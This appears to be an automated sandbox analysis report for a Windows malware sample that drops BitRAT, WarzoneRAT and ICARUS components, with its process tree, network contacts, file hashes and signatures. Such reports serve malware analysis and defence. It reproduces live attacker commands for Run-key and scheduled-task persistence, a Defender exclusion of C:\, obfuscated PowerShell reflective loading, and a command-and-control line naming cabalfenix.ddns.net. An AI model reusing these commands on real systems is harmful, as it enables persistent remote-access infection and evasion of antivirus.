\\?\C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe

"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {A99EE01B-E8FC-40AC-BFAA-FB04EFD10345} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "781834726-469034446389577595-1944380462-2039113711-55127832512762804791238524382"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline"

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0xc4

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{28133f46-3ead-466c-9f65-412012f4dd54}

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath C:\

C:\ProgramData\$77images.exe

"C:\ProgramData\$77images.exe"

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{900f862d-3775-444b-a619-2e15ccffe35b}

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp

Files

memory/1476-54-0x0000000000210000-0x0000000000AEC000-memory.dmp

memory/1476-55-0x0000000075E51000-0x0000000075E53000-memory.dmp

memory/1996-56-0x0000000000000000-mapping.dmp

memory/604-58-0x0000000000000000-mapping.dmp

memory/840-59-0x0000000000000000-mapping.dmp

memory/1096-60-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/1096-61-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/1096-62-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/1096-64-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/1096-66-0x000000000040159D-mapping.dmp

memory/1096-65-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/1096-69-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/1996-70-0x0000000070CC0000-0x000000007126B000-memory.dmp

memory/1792-71-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 11ba16e5ee0670ab6d6b482c52b7fdba
SHA1 5e530389d8005031f990e4dced5797f8cb9703b7
SHA256 f5d6bc3e79b6b39eaf4bdff7a02ec6adf6d9564f3f56b08ca85f2aca99a6b45b
SHA512 b4d6489671d0ed6ceafc108fcb8b4598667256dec197422499c0687368a71b395fe49af0134371fa81fa0f202cad7cf5d249d45f424dc28f7765dea5a3543f81

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

MD5 2656bb680bc4b4a95ce5cb1443b2850d
SHA1 3033d5adc32e3df44205408dd3689670756e55a4
SHA256 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c
SHA512 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76

memory/524-75-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\$77Install.exe

MD5 2656bb680bc4b4a95ce5cb1443b2850d
SHA1 3033d5adc32e3df44205408dd3689670756e55a4
SHA256 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c
SHA512 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

MD5 f8169767c726f1be7a7e14839cc44d36
SHA1 571bcdb58a2017d77593ea1325bac737160b81f4
SHA256 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377
SHA512 c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

memory/568-83-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

memory/1572-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

MD5 eb51a99599683b7b3d47981722da5218
SHA1 e693b669e2c309869ce31f13661ba6eb3d3b0566
SHA256 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38
SHA512 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

MD5 eb51a99599683b7b3d47981722da5218
SHA1 e693b669e2c309869ce31f13661ba6eb3d3b0566
SHA256 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38
SHA512 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

\Users\Admin\AppData\Local\Temp\$77icaro.exe

MD5 eb51a99599683b7b3d47981722da5218
SHA1 e693b669e2c309869ce31f13661ba6eb3d3b0566
SHA256 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38
SHA512 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

memory/2008-92-0x0000000000000000-mapping.dmp

memory/1572-90-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/1792-96-0x0000000070CC0000-0x000000007126B000-memory.dmp

\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

memory/1560-78-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

MD5 f8169767c726f1be7a7e14839cc44d36
SHA1 571bcdb58a2017d77593ea1325bac737160b81f4
SHA256 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377
SHA512 c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

memory/2008-97-0x0000000000390000-0x0000000000412000-memory.dmp

memory/1472-98-0x0000000000000000-mapping.dmp

memory/1624-99-0x0000000000000000-mapping.dmp

memory/1472-100-0x000007FEFC311000-0x000007FEFC313000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

memory/1580-103-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline

MD5 b3615aa7dcd23c3190e1bba2c2ce0e37
SHA1 55cab252d83d2b86f7bde034877c00cf1d1552c3
SHA256 1f7cfc1c1f36fb592b0e28711cf7d2b51474ec5d1ffe95df315d81c389b96d69
SHA512 8d24b40da010554480eb7340f2e331ad2983fb4ed59dc9bb47b7c4033df80514388aebc4facce9847b6791dff711f147933552837a5228f7df5382a3590e6d03

\??\c:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.0.cs

MD5 b3a0e87506914a518a26de26cc397a0b
SHA1 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3
SHA256 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110
SHA512 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c

memory/1792-106-0x0000000070CC0000-0x000000007126B000-memory.dmp

memory/1996-107-0x0000000070CC0000-0x000000007126B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp

MD5 8d392b2e8c5a57c271da43346be3b755
SHA1 364fad374140d78864c686f53295a0030481b557
SHA256 a55bab7f12f8282bbf044892f301fc29315f86246eee71d2eba2b286f9cc47a8
SHA512 e634d9254ae93b85dda6b7c450af802ba6e92a98c0c7eb5d96f232d1408010dacc37fddb4a44e99c80058ceba4f94b951d88451627175bd31c5cc0e13d13613d

memory/1940-111-0x0000000000000000-mapping.dmp

memory/1476-114-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

MD5 77dfcb6c2834e0bf0aedff8da1d1a0f9
SHA1 33fd25bb36a6b9480ac4ea0e0feea2ca109cb457
SHA256 f7bd87564247b2fd4bc12f1aa618a2a7fc59a50200d0c82dc1c7726c8ad68e5d
SHA512 aabf94dc1f1a83747b9b4cce1bf82a18d65883f27664b91ac49fc59000f243ff35addfc2d590703ff0c7c415caef9105564581f12882da118c5c7eb1fcc20d6c

memory/2024-119-0x0000000000000000-mapping.dmp

memory/1276-118-0x0000000000130000-0x0000000000138000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

MD5 77dfcb6c2834e0bf0aedff8da1d1a0f9
SHA1 33fd25bb36a6b9480ac4ea0e0feea2ca109cb457
SHA256 f7bd87564247b2fd4bc12f1aa618a2a7fc59a50200d0c82dc1c7726c8ad68e5d
SHA512 aabf94dc1f1a83747b9b4cce1bf82a18d65883f27664b91ac49fc59000f243ff35addfc2d590703ff0c7c415caef9105564581f12882da118c5c7eb1fcc20d6c

memory/1276-115-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP

MD5 1d5543c367c49b9dd6366270fdd4ee3a
SHA1 bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66
SHA256 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2
SHA512 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

memory/1348-108-0x0000000000000000-mapping.dmp

memory/1472-121-0x000007FEEBAF0000-0x000007FEEC513000-memory.dmp

memory/1472-123-0x0000000001374000-0x0000000001377000-memory.dmp

memory/1472-122-0x000007FEEEA20000-0x000007FEEF57D000-memory.dmp

memory/1472-124-0x000000000137B000-0x000000000139A000-memory.dmp

memory/1472-125-0x0000000077A90000-0x0000000077C39000-memory.dmp

memory/1624-126-0x0000000073AD0000-0x000000007407B000-memory.dmp

memory/1472-128-0x0000000077870000-0x000000007798F000-memory.dmp

memory/1472-127-0x0000000077A90000-0x0000000077C39000-memory.dmp

memory/1196-129-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1196-130-0x0000000140002300-mapping.dmp

memory/1196-132-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1196-133-0x0000000077A90000-0x0000000077C39000-memory.dmp

memory/1196-134-0x0000000077870000-0x000000007798F000-memory.dmp

memory/1196-135-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1196-136-0x0000000077A90000-0x0000000077C39000-memory.dmp

memory/416-137-0x0000000000830000-0x0000000000854000-memory.dmp

memory/416-140-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp

memory/460-149-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp

memory/416-142-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/416-147-0x0000000000830000-0x0000000000854000-memory.dmp

memory/1636-145-0x0000000000000000-mapping.dmp

memory/1028-146-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

memory/2112-158-0x0000000000000000-mapping.dmp

\ProgramData\$77images.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

\ProgramData\$77images.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

memory/2144-159-0x0000000000400000-0x0000000000422000-memory.dmp

memory/476-153-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp

memory/1472-154-0x0000000001374000-0x0000000001377000-memory.dmp

memory/460-150-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/416-155-0x0000000000A00000-0x0000000000A2B000-memory.dmp

memory/1624-161-0x0000000077C70000-0x0000000077DF0000-memory.dmp

memory/476-160-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/460-163-0x0000000000100000-0x000000000012B000-memory.dmp

memory/476-164-0x0000000000120000-0x000000000014B000-memory.dmp

memory/2144-166-0x0000000000402597-mapping.dmp

memory/2244-168-0x0000000000000000-mapping.dmp

memory/2144-170-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 11ba16e5ee0670ab6d6b482c52b7fdba
SHA1 5e530389d8005031f990e4dced5797f8cb9703b7
SHA256 f5d6bc3e79b6b39eaf4bdff7a02ec6adf6d9564f3f56b08ca85f2aca99a6b45b
SHA512 b4d6489671d0ed6ceafc108fcb8b4598667256dec197422499c0687368a71b395fe49af0134371fa81fa0f202cad7cf5d249d45f424dc28f7765dea5a3543f81

memory/1472-173-0x000000000137B000-0x000000000139A000-memory.dmp

memory/1472-174-0x0000000077A90000-0x0000000077C39000-memory.dmp

memory/1560-175-0x00000000003B0000-0x00000000003CB000-memory.dmp

memory/1472-176-0x0000000077870000-0x000000007798F000-memory.dmp

memory/1560-180-0x00000000003B0000-0x00000000003CB000-memory.dmp

memory/1560-182-0x00000000003D0000-0x00000000003F0000-memory.dmp

memory/568-185-0x0000000002890000-0x00000000029EE000-memory.dmp

memory/2144-187-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2144-189-0x0000000077C70000-0x0000000077DF0000-memory.dmp

memory/1636-192-0x0000000073AD0000-0x000000007407B000-memory.dmp

memory/1572-196-0x0000000002880000-0x00000000028A0000-memory.dmp

C:\ProgramData\$77images.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

memory/1636-198-0x0000000004C20000-0x0000000004C40000-memory.dmp

memory/2112-199-0x0000000000090000-0x00000000000B0000-memory.dmp

memory/2144-200-0x0000000000140000-0x0000000000160000-memory.dmp

memory/1624-201-0x0000000000CE0000-0x000000000192A000-memory.dmp

memory/1624-202-0x00000000032E0000-0x0000000003300000-memory.dmp

memory/1624-203-0x0000000073AD0000-0x000000007407B000-memory.dmp

memory/1196-204-0x0000000077A90000-0x0000000077C39000-memory.dmp

memory/416-205-0x0000000000A00000-0x0000000000A2B000-memory.dmp

memory/1636-197-0x0000000004F60000-0x00000000055B1000-memory.dmp

memory/1636-206-0x0000000073AD0000-0x000000007407B000-memory.dmp

memory/1624-207-0x0000000077C70000-0x0000000077DF0000-memory.dmp

memory/460-208-0x0000000000100000-0x000000000012B000-memory.dmp

memory/476-209-0x0000000000120000-0x000000000014B000-memory.dmp

memory/568-210-0x0000000002890000-0x00000000029EE000-memory.dmp

memory/484-212-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp

memory/484-237-0x0000000000360000-0x000000000038B000-memory.dmp

memory/484-240-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/576-243-0x0000000000430000-0x000000000045B000-memory.dmp

memory/576-246-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/652-252-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/652-249-0x0000000000520000-0x000000000054B000-memory.dmp

memory/744-257-0x0000000000A10000-0x0000000000A3B000-memory.dmp

memory/744-263-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/800-268-0x0000000000840000-0x000000000086B000-memory.dmp

memory/800-275-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/832-281-0x00000000008C0000-0x00000000008EB000-memory.dmp

memory/832-286-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/872-290-0x0000000000A40000-0x0000000000A6B000-memory.dmp

memory/296-296-0x0000000001B90000-0x0000000001BBB000-memory.dmp

memory/340-293-0x0000000000130000-0x000000000015B000-memory.dmp

memory/1168-306-0x0000000001E10000-0x0000000001E3B000-memory.dmp

memory/1168-307-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/1036-304-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

memory/1036-300-0x00000000007A0000-0x00000000007CB000-memory.dmp

memory/1256-308-0x0000000001BB0000-0x0000000001BDB000-memory.dmp

memory/1340-310-0x0000000002780000-0x00000000027AB000-memory.dmp

memory/1256-309-0x0000000037AD0000-0x0000000037AE0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-12-15 13:24

Reported

2022-12-15 13:27

Platform

win10v2004-20220901-en

Max time kernel

27s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"

Signatures

BitRAT

trojan bitrat

WarzoneRat, AveMaria

rat infostealer warzonerat

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
